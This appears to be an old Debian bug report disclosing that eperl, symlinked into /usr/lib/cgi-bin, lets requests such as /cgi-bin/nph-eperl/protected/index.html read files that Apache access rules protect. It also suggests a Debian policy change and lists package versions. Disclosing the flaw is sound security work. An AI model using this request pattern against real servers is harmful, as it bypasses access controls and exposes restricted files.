eperl can be used to read files that the web server access control rules deny access to. The problem is that a symlink to eperl is installed in /usr/lib/cgi-bin, so any protected file ending in an extension which eperl decides to handle (including .html), can read. E.g. if Apache's DocumentRoot is set to /var/www, and /var/www/protected is restricted to access by certain hosts, it is possible to read /var/www/protected/index.html by requesting /cgi-bin/nph-eperl/protected/index.html.
eperl, and other interpreters / server-side languages should probably not be installed in /usr/lib/cgi-bin; perhaps debian-policy should mention this in the section on web servers and cgi-bin (at the moment it says that all CGI scripts should be there). Unfortunately moving interpreters from /usr/lib/cgi-bin will prevent their use as a server-side language in Apache using the AddType and Action directives, so it's back to shebang lines, I guess. -- System Information Debian Release: 2.2 Kernel Version: Linux lamia 2.2.14 #1 Tue Feb 1 20:45:54 GMT 2000 i686 unknown Versions of the packages eperl depends on: hi libc6 2.1.2-13 GNU C Library: Shared libraries and Timezone ii libgdbmg1 1.7.3-26.2 GNU dbm database routines (runtime version). ii perl-5.005 5.005.03-5.3 Larry Wall's Practical Extracting and Report -- "Damaged people are dangerous, they know they can survive"
